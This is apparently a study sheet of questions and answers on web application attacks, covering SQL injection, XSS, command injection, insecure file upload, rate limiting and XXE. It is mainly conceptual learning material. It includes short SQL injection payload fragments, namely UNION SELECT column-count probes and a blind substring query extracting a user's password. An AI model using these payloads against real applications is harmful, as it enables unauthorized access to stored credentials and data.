Attacking Web Apps

Question 1

SQL Injection

What is UNION SELECT? How it can be used to perform a SQL Injection attack?

Answer 1

UNION SELECT is a method that allows the user to include information from other tables or columns that were not initially defined. But there is one constraint: You can only select the same number of columns as in the original query.
So an attacker can use UNION select with values to represent each column, starting with one and adding a column until the response is positive, with no errors. The values can be used to see which one of the columns are actually displayed.

… union select 1#
… union select 1,2#
… union select 1,2,3#

After this, the hacker can then start to enumerate the database and retrieve desired information by adding queries to the right columns.

Question 2

What is blind SQL Injection?

Answer 2

It’s a type of SQL injection where the way to extract data is different. Typically, it occurs when the application returns generic error messages, but has not mitigated the vulnerable code, so an attacker can ask true or false questions to the database and determine the answer for each one of them based on the response returned by or behavior of the application

Question 3

What is a content-based blind SQL Injection?

Answer 3

The attacker will check the result by looking at the content of the given response. To start, two queries are sent, one that returns true and other that returns false. Then the responses will be compared to check if it is possible to know the value of a query based on the response content. Finally, if possible, the attacker can run other queries and perform the attack.

Question 4

What is a time-based blind SQL injeciton?

Answer 4

In this type of blind SQL injection, the attacker will use the following logic to retrieve inormation:
IF query is true, wait x seconds to return the response.
With this, is possible to know if the query is true even if the application doesn’t display anything different.

Question 5

This query is being used to perform a blind SQL injection, what is wrong with it?
‘ and substring(select password from injection 0x02 where username = ‘jessamy’, 1, 1) = ‘a’

Answer 5

The select operation inside the substring function should be involved in parenthesis, to indicate to SQL that this operation must be resolved first, otherwise the comparation will not work properly.

Question 6

What is XSS?

Answer 6

Cross-site scripting is an attack that allows a hacker to inject malicious scripts to web applications. It happens when the app accepts user input but does not perform the proper validation of it. So the attacker can manipulate the website and make it return malicious javascript to other users, circumventing the SOP. When the malicious code executes in a victim’s browser, the attacker can compromise their interaction.

Question 7

What is reflected XSS?

Answer 7

Also known as non-persistent, it occurs when the user input is immediately returned, without being permanently stored. Usually te victmin must click a malicious url.

Question 8

What is stored XSS?

Answer 8

Also known as persistent, it occurs when the user input is stored in the target server. The victim will retrieve this malicious data later.

Question 9

What is DOM-Based XSS?

Answer 9

Also knwon as Type-0, it occurs when the payload is executed by modifying the DOM environment in the victim’s browser. The payload never leaves the browser and the HTML page does not change, but the client side code will execute differently because of the malicious modifications that were made.

Question 10

What is command injection?

Answer 10

Os command injection, also known as shell injection, is a web application vulnerability that allows an attacker to run arbitrary OS commands in the server that is running the application.

Question 11

What is insecure file upload?

Answer 11

When a web server allows an user to upload a file without sufficiently validating its name, type, content or size. Usually is used to achieve RCE, but there are other possibilities and ways to cause an impact.

Question 12

What are the key factors that can affect the impact of a insecure file upload exploitation?

Answer 12

There are two key factors:
* Which aspects of the file are being correctly validated.
* What restrictions are imposed to the file once it has been successfully updated.

Question 13

Insecure file upload

Cite possible impacts that do not involve getting a shell.

Answer 13

Overwriting files, achieve stored XSS, upload files to another directory or empty the machine’s memory causing a DoS.

Question 14

What is account locking? What is the main weakness of this method?

Answer 14

It’s a mechanism for brute-force protection that consists of locking an account if a certain criteria is met, usually a number of failed login attempts.
This method provides an certain level of protection if the attacker is trying to brute-force one specific account, but it fails if the attacker is performing credential stuffing or password spraying attacks.

Question 15

What is rate limiting?

Answer 15

It’s a brute-force protection that consists of blocking an IP address if too many login requests are made in a short period of time.

Question 16

What should you test in a rate limit implementation?

Answer 16

If the request counter resets when a successful login occurs. If this happens an attacker can simply put some correct credentials in regular intervals and make this protection virtually useless.
Also test changing your IP, since there are several ways of doing that.

Question 17

Why is rate limiting more preferable than account locking?

Answer 17

Because rate limiting is less prone to username enumeration and denial of service attacks.

Question 18

What is XXE?

Answer 18

XML External Entity injection is a web security vulnerability that allows an attacker to interfere with an application’s processing of XML data. Usually allows an attacker to read files or interact with the back-end of the application.

Question 19

What are XML external entities?

Answer 19

XML external entities are a type of custom XML entity whose defined value is loaded from outside the DTD in which they are declared. This allows an entity to be defined based on the contents of a file or URL.

Question 20

How do XXE vulnerabilities arise?

Answer 20

Some applications use the XML format to transmit data between the browser and the server. Applications that do this virtually always use a standard library or API to process the XML data on the server. The problem is that standard parsers support potentially dangerous features by default even if the application is not using them.

Question 21

True or false. If false, explain

You can only perform XXE attacks in requests that contain data in XML format.

Answer 21

False. The attack surface for XXE injection is obvious in many cases, when the application’s HTTP requests contain XML data. Sometimes the attack surface is less visible, but you can still perform XXE injection attacks in requests that do not contain any XML data by looking in the right places, better analysing the request.

Question 22

XXE

In which situation should you consider using a XInclude attack?

Answer 22

When an application receives the client-submitted data, embed it on the server-side into an XML document and then parse the document. Since the attacker does not control the entire XML document, he will not be able to create or modify a DOCTYPE element.

Question 23

True or false

Some common file formats use XML or have XML subcomponents. This is potentially dangerous because an attacker could end up reaching a hidden XXE attack surface.

Answer 23

True. For example, the SVG format is XML-Based. A malicious svg file could be uploaded to the server to perform an XXE attack.